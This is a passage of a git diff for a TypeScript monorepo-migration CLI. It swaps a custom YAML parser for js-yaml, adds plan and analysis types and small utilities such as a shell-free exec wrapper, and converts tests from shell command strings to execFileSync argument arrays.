'${nodeVersion}'${pmSetup} + + - name: Install dependencies + run: ${installCmd} + + - name: Build + run: ${pm} run build --filter=\${{ matrix.package }} 2>/dev/null || true + working-directory: . + + - name: Test + run: ${pm} run test --filter=\${{ matrix.package }} 2>/dev/null || true + working-directory: . +`; + + return { + relativePath: '.github/workflows/monotize-ci.yml', + content, + }; +} + +/** + * Move existing workflows to a legacy directory. + * Returns the list of files that would be moved (for plan serialization). 
+ */ +export function planLegacyWorkflowMoves( + existingWorkflows: string[], +): Array<{ from: string; to: string }> { + return existingWorkflows.map((wf) => ({ + from: `.github/workflows/${wf}`, + to: `.github/workflows/legacy/${wf}`, + })); +} diff --git a/src/strategies/workflow-merge.ts b/src/strategies/workflow-merge.ts index 1e0b5f2..7026d56 100755 --- a/src/strategies/workflow-merge.ts +++ b/src/strategies/workflow-merge.ts @@ -1,4 +1,5 @@ import path from 'node:path'; +import yaml from 'js-yaml'; import type { WorkflowMergeOptions, WorkflowMergeStrategy } from '../types/index.js'; import { pathExists, readFile, writeFile, ensureDir, listFiles } from '../utils/fs.js'; @@ -40,209 +41,18 @@ interface WorkflowStep { } /** - * Parse YAML content into a workflow object - * Note: This is a simplified YAML parser for GitHub Actions workflows + * Parse YAML content into a workflow object using js-yaml */ function parseYaml(content: string): GitHubWorkflow { - const lines = content.split('\n'); - const result: Record = {}; - const stack: { indent: number; obj: Record; key?: string }[] = [ - { indent: -1, obj: result }, - ]; - - let currentArray: unknown[] | null = null; - let currentArrayKey: string | null = null; - let currentArrayIndent = 0; - - for (const line of lines) { - // Skip empty lines and comments - if (!line.trim() || line.trim().startsWith('#')) { - continue; - } - - const indent = line.search(/\S/); - const trimmed = line.trim(); - - // Handle array items - if (trimmed.startsWith('- ')) { - const value = trimmed.slice(2).trim(); - - if (currentArray && indent >= currentArrayIndent) { - if (value.includes(':')) { - // Object in array - const [objKey, objValue] = value.split(':').map((s) => s.trim()); - const obj: Record = {}; - if (objValue) { - obj[objKey] = parseValue(objValue); - } else { - obj[objKey] = null; - } - currentArray.push(obj); - } else { - currentArray.push(parseValue(value)); - } - continue; - } - } - - // Handle key-value pairs - if 
(trimmed.includes(':')) { - const colonIndex = trimmed.indexOf(':'); - const key = trimmed.slice(0, colonIndex).trim(); - const value = trimmed.slice(colonIndex + 1).trim(); - - // Pop stack to find correct parent - while (stack.length > 1 && stack[stack.length - 1].indent >= indent) { - stack.pop(); - } - - const parent = stack[stack.length - 1].obj; - - if (value === '' || value.startsWith('|') || value.startsWith('>')) { - // Nested object or multiline string - const newObj: Record = {}; - parent[key] = newObj; - stack.push({ indent, obj: newObj, key }); - currentArray = null; - currentArrayKey = null; - } else if (value === '[]' || value === '{}') { - parent[key] = value === '[]' ? [] : {}; - } else { - parent[key] = parseValue(value); - } - - // Check if next line starts an array for this key - currentArrayKey = key; - currentArrayIndent = indent; - } - - // Handle array start - if (trimmed.startsWith('- ') && !currentArray) { - // Pop stack to find correct parent - while (stack.length > 1 && stack[stack.length - 1].indent >= indent) { - stack.pop(); - } - - const parent = stack[stack.length - 1].obj; - if (currentArrayKey && parent[currentArrayKey] === undefined) { - const arr: unknown[] = []; - parent[currentArrayKey] = arr; - currentArray = arr; - currentArrayIndent = indent; - - const value = trimmed.slice(2).trim(); - if (value.includes(':')) { - const [objKey, objValue] = value.split(':').map((s) => s.trim()); - const obj: Record = {}; - if (objValue) { - obj[objKey] = parseValue(objValue); - } - currentArray.push(obj); - } else if (value) { - currentArray.push(parseValue(value)); - } - } - } - } - - return result as GitHubWorkflow; -} - -/** - * Parse a YAML value - */ -function parseValue(value: string): unknown { - // Remove quotes - if ((value.startsWith('"') && value.endsWith('"')) || (value.startsWith("'") && value.endsWith("'"))) { - return value.slice(1, -1); - } - - // Parse booleans - if (value === 'true') return true; - if (value === 'false') 
return false; - - // Parse null - if (value === 'null' || value === '~') return null; - - // Parse numbers - if (/^-?\d+$/.test(value)) return parseInt(value, 10); - if (/^-?\d+\.\d+$/.test(value)) return parseFloat(value); - - return value; + const result = yaml.load(content); + return (typeof result === 'object' && result !== null ? result : {}) as GitHubWorkflow; } /** - * Convert a workflow object back to YAML string + * Convert a workflow object back to YAML string using js-yaml */ -function stringifyYaml(obj: unknown, indent = 0): string { - const prefix = ' '.repeat(indent); - let result = ''; - - if (obj === null || obj === undefined) { - return 'null'; - } - - if (typeof obj !== 'object') { - if (typeof obj === 'string') { - // Quote strings with special characters - if (obj.includes(':') || obj.includes('#') || obj.includes('\n') || obj.startsWith(' ') || obj.includes('\\') || obj.includes('"')) { - // Escape backslashes first, then double quotes - const escaped = obj.replace(/\\/g, '\\\\').replace(/"/g, '\\"'); - return `"${escaped}"`; - } - return obj; - } - return String(obj); - } - - if (Array.isArray(obj)) { - if (obj.length === 0) { - return '[]'; - } - for (const item of obj) { - if (typeof item === 'object' && item !== null) { - result += `${prefix}- `; - const entries = Object.entries(item); - if (entries.length > 0) { - const [firstKey, firstValue] = entries[0]; - result += `${firstKey}: ${stringifyYaml(firstValue, 0)}\n`; - for (let i = 1; i < entries.length; i++) { - const [key, value] = entries[i]; - if (typeof value === 'object' && value !== null) { - result += `${prefix} ${key}:\n${stringifyYaml(value, indent + 2)}`; - } else { - result += `${prefix} ${key}: ${stringifyYaml(value, 0)}\n`; - } - } - } - } else { - result += `${prefix}- ${stringifyYaml(item, 0)}\n`; - } - } - return result; - } - - // Object - const entries = Object.entries(obj); - if (entries.length === 0) { - return '{}'; - } - - for (const [key, value] of entries) { - if 
(typeof value === 'object' && value !== null) { - if (Array.isArray(value) && value.length === 0) { - result += `${prefix}${key}: []\n`; - } else if (!Array.isArray(value) && Object.keys(value).length === 0) { - result += `${prefix}${key}: {}\n`; - } else { - result += `${prefix}${key}:\n${stringifyYaml(value, indent + 1)}`; - } - } else { - result += `${prefix}${key}: ${stringifyYaml(value, 0)}\n`; - } - } - - return result; +function stringifyYaml(obj: unknown): string { + return yaml.dump(obj, { lineWidth: -1, noRefs: true, quotingType: '"' }); } /** diff --git a/src/types/index.ts b/src/types/index.ts index d5339a3..46df99b 100755 --- a/src/types/index.ts +++ b/src/types/index.ts @@ -363,6 +363,8 @@ export interface AnalyzeResult { hotspots?: DependencyHotspot[]; /** Categorized findings with confidence */ findings?: AnalysisFindings; + /** Extended analysis from Stage 12 analyzers */ + extendedAnalysis?: ExtendedAnalysis; } /** @@ -737,3 +739,389 @@ export interface ConfigureResult { scaffoldedFiles: Array<{ relativePath: string; description: string }>; skippedConfigs: Array<{ name: string; reason: string }>; } + +// ============================================================================ +// Stage 11: Full Lifecycle Plan Types +// ============================================================================ + +/** + * Base interface for all plan artifacts + */ +export interface PlanBase { + /** Schema version for forward compatibility */ + schemaVersion: 1; + /** ISO-8601 creation timestamp */ + createdAt: string; + /** Fields that were redacted (e.g. tokens, paths) */ + redactedFields?: string[]; +} + +/** + * A decision made during plan generation + */ +export interface PlanDecision { + /** Unique identifier */ + id: string; + /** Kind of decision (version-conflict, file-collision, etc.) 
*/ + kind: string; + /** The chosen resolution */ + chosen: string; + /** Other possible resolutions */ + alternatives: string[]; +} + +/** + * A discrete operation within a plan + */ +export interface PlanOperation { + /** Unique identifier */ + id: string; + /** Operation type (copy, write, move, exec, api-call, etc.) */ + type: string; + /** Human-readable description */ + description: string; + /** Input paths or references */ + inputs: string[]; + /** Output paths or references */ + outputs: string[]; +} + +/** + * PreparationPlan wraps PrepareAnalysis into a serializable plan artifact + */ +export interface PreparationPlan extends PlanBase { + /** Checklist items from preparation analysis */ + checklist: PrepCheckItem[]; + /** Patches generated for auto-fixable items */ + patches: PrepPatch[]; + /** Optional workspace clone + apply actions */ + workspaceCloneActions?: Array<{ + repoName: string; + branch: string; + patchFiles: string[]; + }>; +} + +/** + * AddPlan for adding a repo to an existing monorepo + */ +export interface AddPlan extends PlanBase { + /** Source repository being added */ + sourceRepo: RepoSource; + /** Path to target monorepo */ + targetMonorepo: string; + /** Packages subdirectory */ + packagesDir: string; + /** Analysis of the addition */ + analysis: AnalyzeResult; + /** Decisions made during planning */ + decisions: PlanDecision[]; + /** Operations to execute */ + operations: PlanOperation[]; +} + +/** + * ArchivePlan for deprecating old repositories + */ +export interface ArchivePlan extends PlanBase { + /** Repositories to archive */ + repos: Array<{ + name: string; + url: string; + readmePatch: string; + }>; + /** URL of the monorepo these repos migrated to */ + monorepoUrl: string; + /** Optional GitHub API operations (require token) */ + apiOperations?: Array<{ + repo: string; + action: 'archive' | 'update-description'; + }>; +} + +/** + * Strategy for branch migration + */ +export type BranchMigrateStrategy = 'subtree' | 
'replay'; + +/** + * BranchPlan for migrating branches between repos + */ +export interface BranchPlan extends PlanBase { + /** Branch name to migrate */ + branch: string; + /** Source repository */ + sourceRepo: string; + /** Target monorepo */ + targetMonorepo: string; + /** Migration strategy */ + strategy: BranchMigrateStrategy; + /** Operations to execute */ + operations: PlanOperation[]; + /** Dry-run report with estimates */ + dryRunReport?: { + commitCount: number; + estimatedTime: string; + contributors: string[]; + }; +} + +/** + * Options for the add command + */ +export interface AddCommandOptions { + /** Path to target monorepo */ + to: string; + /** Packages subdirectory */ + packagesDir: string; + /** Output path for plan JSON */ + out?: string; + /** Apply immediately after planning */ + apply?: boolean; + /** Conflict resolution strategy */ + conflictStrategy: ConflictStrategy; + /** Verbose output */ + verbose?: boolean; + /** Package manager */ + packageManager: PackageManagerType; +} + +/** + * Options for the archive command + */ +export interface ArchiveCommandOptions { + /** URL of the monorepo */ + monorepoUrl: string; + /** Output path for plan JSON */ + out?: string; + /** Apply immediately (requires token) */ + apply?: boolean; + /** Read GitHub token from environment */ + tokenFromEnv?: boolean; + /** Verbose output */ + verbose?: boolean; +} + +/** + * Options for the migrate-branch command + */ +export interface MigrateBranchCommandOptions { + /** Source repository */ + from: string; + /** Target monorepo */ + to: string; + /** Migration strategy */ + strategy: BranchMigrateStrategy; + /** Output path for plan JSON */ + out?: string; + /** Apply immediately */ + apply?: boolean; + /** Verbose output */ + verbose?: boolean; +} + +// ============================================================================ +// Stage 12: Extended Analysis Types +// ============================================================================ + +/** + * 
Severity of an analysis finding + */ +export type FindingSeverity = 'info' | 'warn' | 'error' | 'critical'; + +/** + * Confidence level for a finding + */ +export type FindingConfidence = 'high' | 'medium' | 'low'; + +/** + * Evidence for an analysis finding + */ +export interface FindingEvidence { + /** File path where evidence was found */ + path: string; + /** Line number, if applicable */ + line?: number; + /** Code snippet or content */ + snippet?: string; +} + +/** + * A single analysis finding with actionable information + */ +export interface AnalysisFinding { + /** Unique identifier (e.g. 'env-node-mismatch') */ + id: string; + /** Human-readable title */ + title: string; + /** Severity level */ + severity: FindingSeverity; + /** Confidence in this finding */ + confidence: FindingConfidence; + /** Supporting evidence */ + evidence: FindingEvidence[]; + /** Suggested action to resolve */ + suggestedAction: string; +} + +/** + * Migration risk classification + */ +export type RiskClassification = 'straightforward' | 'needs-decisions' | 'complex'; + +/** + * Summary of migration risk + */ +export interface RiskSummary { + /** Overall classification */ + classification: RiskClassification; + /** Reasons for this classification */ + reasons: string[]; + /** Top findings driving the classification */ + topFindings: AnalysisFinding[]; +} + +/** + * Extended analysis covering environment, tooling, CI, publishing, and risks + */ +export interface ExtendedAnalysis { + /** Node.js version signals and mismatches */ + environment: AnalysisFinding[]; + /** Package manager detection and inconsistencies */ + packageManager: AnalysisFinding[]; + /** TypeScript, lint, format, test tool detection */ + tooling: AnalysisFinding[]; + /** CI/CD workflow systems and conflicts */ + ci: AnalysisFinding[]; + /** Publishing configuration and recommendations */ + publishing: AnalysisFinding[]; + /** Repository risks (submodules, LFS, large files, case collisions) */ + repoRisks: 
AnalysisFinding[]; + /** Overall risk summary */ + riskSummary: RiskSummary; +} + +// ============================================================================ +// Stage 14: Configure Engine Types +// ============================================================================ + +/** + * A file patch in a configuration plan + */ +export interface ConfigPatch { + /** File path relative to monorepo root */ + path: string; + /** Content before (null for new files) */ + before?: string; + /** Content after */ + after: string; + /** Human-readable description */ + description: string; +} + +/** + * Configuration plan for workspace scaffolding + */ +export interface ConfigPlan extends PlanBase { + /** File patches to apply */ + patches: ConfigPatch[]; + /** Warnings for configs that can't be safely merged */ + warnings: Array<{ + config: string; + reason: string; + suggestion: string; + }>; +} + +// ============================================================================ +// Stage 15: Dependency Enforcement Types +// ============================================================================ + +/** + * Result of dependency enforcement generation + */ +export interface DependencyEnforcementResult { + /** Overrides/resolutions to add to root package.json */ + overrides: Record<string, string>; + /** Key name for the PM (pnpm.overrides, resolutions, overrides) */ + overridesKey: string; + /** Internal deps normalized to workspace protocol */ + workspaceProtocolUpdates: Array<{ + packageName: string; + dependency: string; + from: string; + to: string; + }>; +} + +// ============================================================================ +// Stage 18: Smart Defaults Types +// ============================================================================ + +/** + * A suggested decision with evidence + */ +export interface SuggestedDecision { + /** What is being decided */ + topic: string; + /** The suggested value */ + suggestion: string; + /** Confidence level */ + confidence:
FindingConfidence; + /** Evidence supporting this suggestion */ + evidence: string[]; + /** Alternative options */ + alternatives: string[]; +} + +/** + * An actionable error with hints + */ +export interface ActionableError { + /** Error message */ + message: string; + /** Error code */ + code?: string; + /** Hint for resolution */ + hint?: string; + /** Related documentation or commands */ + suggestions?: string[]; +} + +// ============================================================================ +// Stage 19: Multi-Language Types +// ============================================================================ + +/** + * Detected language in a repository + */ +export interface LanguageDetection { + /** Repository name */ + repoName: string; + /** Detected languages */ + languages: Array<{ + name: 'go' | 'rust' | 'python' | 'javascript' | 'typescript'; + /** Marker files that indicate this language */ + markers: string[]; + /** Metadata (e.g. module path for Go, crate name for Rust) */ + metadata?: Record<string, string>; + }>; +} + +// ============================================================================ +// Stage 20: Performance Types +// ============================================================================ + +/** + * Progress event for long-running operations + */ +export interface ProgressEvent { + /** Current step number */ + current: number; + /** Total steps */ + total: number; + /** Label for the current step */ + label: string; + /** Percentage complete (0-100) */ + percentage: number; +} diff --git a/src/utils/cli-options.ts b/src/utils/cli-options.ts new file mode 100644 index 0000000..a85ceb5 --- /dev/null +++ b/src/utils/cli-options.ts @@ -0,0 +1,30 @@ +import type { + ConflictStrategy, + WorkspaceTool, + WorkflowMergeStrategy, +} from '../types/index.js'; + +const CONFLICT_STRATEGIES: readonly ConflictStrategy[] = ['highest', 'lowest', 'prompt']; +const WORKSPACE_TOOLS: readonly WorkspaceTool[] = ['turbo', 'nx', 'none']; +const WORKFLOW_STRATEGIES:
readonly WorkflowMergeStrategy[] = ['combine', 'keep-first', 'keep-last', 'skip']; + +export function parseConflictStrategy(input: string): ConflictStrategy | null { + const normalized = input.trim().toLowerCase(); + return (CONFLICT_STRATEGIES as readonly string[]).includes(normalized) + ? (normalized as ConflictStrategy) + : null; +} + +export function parseWorkspaceTool(input: string): WorkspaceTool | null { + const normalized = input.trim().toLowerCase(); + return (WORKSPACE_TOOLS as readonly string[]).includes(normalized) + ? (normalized as WorkspaceTool) + : null; +} + +export function parseWorkflowStrategy(input: string): WorkflowMergeStrategy | null { + const normalized = input.trim().toLowerCase(); + return (WORKFLOW_STRATEGIES as readonly string[]).includes(normalized) + ? (normalized as WorkflowMergeStrategy) + : null; +} diff --git a/src/utils/concurrency.ts b/src/utils/concurrency.ts new file mode 100755 index 0000000..f249e12 --- /dev/null +++ b/src/utils/concurrency.ts @@ -0,0 +1,27 @@ +/** + * Map items through an async function with limited concurrency. + * Like Promise.all but only runs `concurrency` items at a time. 
+ */ +export async function pMap<T, R>( + items: T[], + fn: (item: T, index: number) => Promise<R>, + concurrency: number = 4, +): Promise<R[]> { + const results: R[] = new Array(items.length); + let index = 0; + + async function worker(): Promise<void> { + while (index < items.length) { + const i = index++; + results[i] = await fn(items[i], i); + } + } + + const workers = Array.from( + { length: Math.min(concurrency, items.length) }, + () => worker(), + ); + + await Promise.all(workers); + return results; +} diff --git a/src/utils/disk.ts b/src/utils/disk.ts new file mode 100755 index 0000000..ef7fc80 --- /dev/null +++ b/src/utils/disk.ts @@ -0,0 +1,40 @@ +import { execFile } from 'node:child_process'; +import { promisify } from 'node:util'; +import path from 'node:path'; + +const execFileAsync = promisify(execFile); + +/** + * Check available disk space at a given path (cross-platform). + */ +export async function checkDiskSpace( + dirPath: string, +): Promise<{ availableBytes: number; sufficient: boolean; requiredBytes?: number }> { + try { + if (process.platform === 'win32') { + // Use wmic on Windows + const drive = path.parse(path.resolve(dirPath)).root; + const { stdout } = await execFileAsync('wmic', [ + 'logicaldisk', 'where', `DeviceID='${drive.replace('\\', '')}'`, + 'get', 'FreeSpace', '/format:value', + ]); + const match = stdout.match(/FreeSpace=(\d+)/); + const availableBytes = match ?
parseInt(match[1], 10) : 0; + return { availableBytes, sufficient: availableBytes > 500_000_000 }; + } else { + // Use df on Unix/macOS + const { stdout } = await execFileAsync('df', ['-k', dirPath]); + const lines = stdout.trim().split('\n'); + if (lines.length >= 2) { + const parts = lines[1].split(/\s+/); + const availableKB = parseInt(parts[3], 10); + const availableBytes = availableKB * 1024; + return { availableBytes, sufficient: availableBytes > 500_000_000 }; + } + return { availableBytes: 0, sufficient: false }; + } + } catch { + // If we can't determine, assume sufficient + return { availableBytes: -1, sufficient: true }; + } +} diff --git a/src/utils/errors.ts b/src/utils/errors.ts new file mode 100755 index 0000000..8befb77 --- /dev/null +++ b/src/utils/errors.ts @@ -0,0 +1,60 @@ +/** + * Thrown instead of calling process.exit() directly, allowing cleanup and testability. + * The top-level CLI handler catches this and calls process.exit(exitCode). + */ +export class CliExitError extends Error { + exitCode: number; + + constructor(exitCode = 1) { + super(`Process exiting with code ${exitCode}`); + this.name = 'CliExitError'; + this.exitCode = exitCode; + } +} + +/** + * An error with an actionable hint for the user. + */ +export class ActionableError extends Error { + hint: string; + + constructor(message: string, hint: string) { + super(message); + this.name = 'ActionableError'; + this.hint = hint; + } +} + +/** + * Shape any error into an ActionableError with a helpful hint. + */ +export function shapeError(err: unknown): ActionableError { + if (err instanceof ActionableError) return err; + + const message = err instanceof Error ? 
err.message : String(err); + + // Pattern match common errors to provide hints + if (message.includes('ENOENT')) { + return new ActionableError(message, 'Check that the file or directory exists'); + } + if (message.includes('EACCES') || message.includes('EPERM')) { + return new ActionableError( + message, + 'Check file permissions or try running with elevated privileges' + ); + } + if (message.includes('git')) { + return new ActionableError( + message, + 'Ensure git is installed and the repository is valid' + ); + } + if (message.includes('ENOSPC')) { + return new ActionableError( + message, + 'Insufficient disk space. Free up space and try again' + ); + } + + return new ActionableError(message, 'Check the error details above and try again'); +} diff --git a/src/utils/exec.ts b/src/utils/exec.ts new file mode 100755 index 0000000..fd6a8fd --- /dev/null +++ b/src/utils/exec.ts @@ -0,0 +1,63 @@ +import { execFile as nodeExecFile } from 'node:child_process'; +import { promisify } from 'node:util'; + +const execFileAsync = promisify(nodeExecFile); + +export interface ExecResult { + stdout: string; + stderr: string; +} + +export interface ExecOptions { + cwd?: string; + timeout?: number; + env?: Record<string, string>; + maxBuffer?: number; +} + +/** + * Safe wrapper around child_process.execFile (no shell). + * Prevents shell injection by never invoking a shell interpreter. + */ +export async function safeExecFile( + cmd: string, + args: string[], + options: ExecOptions = {}, +): Promise<ExecResult> { + const { cwd, timeout = 60_000, env, maxBuffer = 10 * 1024 * 1024 } = options; + + try { + const result = await execFileAsync(cmd, args, { + cwd, + timeout, + env: env ? { ...process.env, ...env } : undefined, + maxBuffer, + shell: false, + }); + return { + stdout: result.stdout?.toString() ?? '', + stderr: result.stderr?.toString() ??
'', + }; + } catch (err: unknown) { + const error = err as Error & { code?: string; stderr?: string; stdout?: string }; + const message = error.stderr || error.message || 'Command failed'; + throw Object.assign(new Error(`${cmd} ${args.join(' ')}: ${message}`), { + code: error.code, + stdout: error.stdout ?? '', + stderr: error.stderr ?? '', + }); + } +} + +/** + * Check if a command is available on PATH + */ +export async function commandExists(cmd: string): Promise<boolean> { + try { + const whichCmd = process.platform === 'win32' ? 'where' : 'which'; + await safeExecFile(whichCmd, [cmd], { timeout: 5_000 }); + return true; + } catch { + return false; + } +} diff --git a/src/utils/fs.ts b/src/utils/fs.ts old mode 100644 new mode 100755 index 0d66e8e..7527699 --- a/src/utils/fs.ts +++ b/src/utils/fs.ts @@ -20,6 +20,7 @@ export async function copyDir( ): Promise<void> { await fs.copy(src, dest, { overwrite: true, + dereference: false, filter: options?.filter, }); } @@ -115,3 +116,12 @@ export async function listDirs(dirPath: string): Promise<string[]> { export async function move(src: string, dest: string): Promise<void> { await fs.move(src, dest, { overwrite: true }); } + +/** + * Normalize a file path to use forward slashes consistently. + * This ensures cross-platform compatibility by replacing both + * the platform separator and backslashes with forward slashes.
+ */ +export function normalizePath(p: string): string { + return p.replace(/[\\/]+/g, '/'); +} diff --git a/src/utils/index.ts b/src/utils/index.ts index 5f5ff8c..7942d8b 100755 --- a/src/utils/index.ts +++ b/src/utils/index.ts @@ -4,3 +4,8 @@ export * from './validation.js'; export * from './prompts.js'; export * from './operation-log.js'; export * from './redact.js'; +export * from './errors.js'; +export * from './concurrency.js'; +export * from './disk.js'; +export * from './progress.js'; +export * from './cli-options.js'; diff --git a/src/utils/progress.ts b/src/utils/progress.ts new file mode 100755 index 0000000..f5f3b3e --- /dev/null +++ b/src/utils/progress.ts @@ -0,0 +1,50 @@ +import { EventEmitter } from 'node:events'; + +export interface ProgressEvent { + current: number; + total: number; + label: string; + percentage: number; +} + +/** + * Simple progress tracker that emits events as items are processed. + */ +export class ProgressEmitter extends EventEmitter { + private current = 0; + private total: number; + + constructor(total: number) { + super(); + this.total = total; + } + + tick(label: string): void { + this.current++; + const event: ProgressEvent = { + current: this.current, + total: this.total, + label, + percentage: Math.round((this.current / this.total) * 100), + }; + this.emit('progress', event); + + if (this.current >= this.total) { + this.emit('done'); + } + } + + reset(total?: number): void { + this.current = 0; + if (total !== undefined) { + this.total = total; + } + } +} + +/** + * Create a progress emitter. 
+ */ +export function createProgressEmitter(total: number): ProgressEmitter { + return new ProgressEmitter(total); +} diff --git a/src/utils/validation.ts b/src/utils/validation.ts index 1fd3d33..8ec2dbd 100755 --- a/src/utils/validation.ts +++ b/src/utils/validation.ts @@ -168,9 +168,16 @@ const GIT_URL_PATTERNS = [ ]; /** - * Extract repository name from various URL formats + * Extract repository name from various URL/path formats. */ -function extractRepoName(input: string): string { +function extractRepoName(input: string, type: RepoSourceType): string { + if (type === 'local') { + // Handle POSIX, Windows drive, and UNC-style local paths. + const withoutTrailingSlash = input.replace(/[\\/]+$/, ''); + const base = path.basename(withoutTrailingSlash); + return base || 'unknown'; + } + // Remove .git suffix if present let name = input.replace(/\.git$/, ''); @@ -181,8 +188,8 @@ function extractRepoName(input: string): string { } // Handle shorthand notation (owner/repo) - if (name.includes('/')) { - const parts = name.split('/'); + if (name.includes('/') || name.includes('\\')) { + const parts = name.split(/[\\/]/); name = parts[parts.length - 1]; } @@ -201,6 +208,11 @@ function determineSourceType(input: string): RepoSourceType { return 'local'; } + // Windows absolute/UNC paths + if (/^[a-zA-Z]:[\\/]/.test(input) || input.startsWith('\\\\')) { + return 'local'; + } + // Check for GitLab shorthand if (GITLAB_SHORTHAND.test(input)) { return 'gitlab'; @@ -262,7 +274,7 @@ export function parseRepoSource(input: string): RepoSource { const trimmed = input.trim(); const type = determineSourceType(trimmed); const resolved = resolveSource(trimmed, type); - const name = extractRepoName(trimmed); + const name = extractRepoName(trimmed, type); return { type, diff --git a/tests/commands/merge.test.ts b/tests/commands/merge.test.ts index f389427..9a37a22 100644 --- a/tests/commands/merge.test.ts +++ b/tests/commands/merge.test.ts @@ -1,11 +1,20 @@ import { describe, it, 
expect, beforeEach, afterEach } from 'vitest'; import path from 'node:path'; import fs from 'fs-extra'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; +const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); const fixturesPath = path.join(process.cwd(), 'tests/fixtures'); const outputDir = path.join(process.cwd(), 'tests/.test-output'); +function runMerge(args: string[], opts: Record = {}): string { + return execFileSync('node', [binPath, 'merge', ...args], { + encoding: 'utf-8', + stdio: 'pipe', + ...opts, + }); +} + describe('merge command integration', () => { beforeEach(async () => { await fs.remove(outputDir); @@ -16,10 +25,11 @@ describe('merge command integration', () => { }); it('should create monorepo structure with --dry-run', () => { - const result = execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b --dry-run -o ${outputDir}`, - { encoding: 'utf-8' } - ); + const result = runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '--dry-run', '-o', outputDir, + ]); // Dry run should show the plan expect(result).toContain('Dry Run Report'); @@ -32,10 +42,11 @@ describe('merge command integration', () => { }); it('should merge two repos with -y flag', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-y', '--no-install', + ]); // Check output structure expect(fs.existsSync(outputDir)).toBe(true); @@ -67,10 +78,12 @@ describe('merge command integration', () => { }); it('should merge three repos', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b ${fixturesPath}/repo-c -o ${outputDir} -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); 
+ runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + path.join(fixturesPath, 'repo-c'), + '-o', outputDir, '-y', '--no-install', + ]); expect(fs.existsSync(path.join(outputDir, 'packages/repo-a'))).toBe(true); expect(fs.existsSync(path.join(outputDir, 'packages/repo-b'))).toBe(true); @@ -84,10 +97,11 @@ describe('merge command integration', () => { }); it('should use custom packages directory', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -p apps -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-p', 'apps', '-y', '--no-install', + ]); expect(fs.existsSync(path.join(outputDir, 'apps/repo-a'))).toBe(true); expect(fs.existsSync(path.join(outputDir, 'apps/repo-b'))).toBe(true); @@ -100,10 +114,11 @@ describe('merge command integration', () => { }); it('should use highest conflict strategy', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -y --conflict-strategy highest --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-y', '--conflict-strategy', 'highest', '--no-install', + ]); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); @@ -114,10 +129,11 @@ describe('merge command integration', () => { }); it('should merge .gitignore files', async () => { - execSync( - `node ./bin/monorepo.js merge ${fixturesPath}/repo-a ${fixturesPath}/repo-b -o ${outputDir} -y --no-install`, - { encoding: 'utf-8', stdio: 'pipe' } - ); + runMerge([ + path.join(fixturesPath, 'repo-a'), + path.join(fixturesPath, 'repo-b'), + '-o', outputDir, '-y', '--no-install', + ]); const gitignore = await fs.readFile( path.join(outputDir, '.gitignore'), @@ -130,7 +146,7 @@ 
describe('merge command integration', () => { }); it('should show help for merge command', () => { - const result = execSync('node ./bin/monorepo.js merge --help', { + const result = execFileSync('node', [binPath, 'merge', '--help'], { encoding: 'utf-8', }); diff --git a/tests/e2e/analyze-command.test.ts b/tests/e2e/analyze-command.test.ts index a9e1acf..f3c3342 100644 --- a/tests/e2e/analyze-command.test.ts +++ b/tests/e2e/analyze-command.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; import fs from 'fs-extra'; import path from 'node:path'; import os from 'node:os'; @@ -65,7 +65,8 @@ describe('analyze command E2E', () => { function runAnalyze(repos: string[], options: string = ''): string { const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); - return execSync(`node ${binPath} analyze ${repos.join(' ')} ${options}`, { + const args = ['analyze', ...repos, ...options.split(/\s+/).filter(Boolean)]; + return execFileSync('node', [binPath, ...args], { encoding: 'utf-8', stdio: 'pipe', }); diff --git a/tests/e2e/cli.test.ts b/tests/e2e/cli.test.ts index 38f622f..bea2489 100644 --- a/tests/e2e/cli.test.ts +++ b/tests/e2e/cli.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; import path from 'node:path'; import fs from 'fs-extra'; import os from 'node:os'; @@ -36,7 +36,7 @@ describe('CLI End-to-End Tests', () => { }); const runCLI = (args: string[], options: { cwd?: string } = {}) => { - return execSync(`node ${CLI_PATH} ${args.join(' ')}`, { + return execFileSync('node', [CLI_PATH, ...args], { cwd: options.cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', @@ -45,7 +45,7 @@ describe('CLI End-to-End Tests', () => { const runCLIExpectError = (args: string[], options: { 
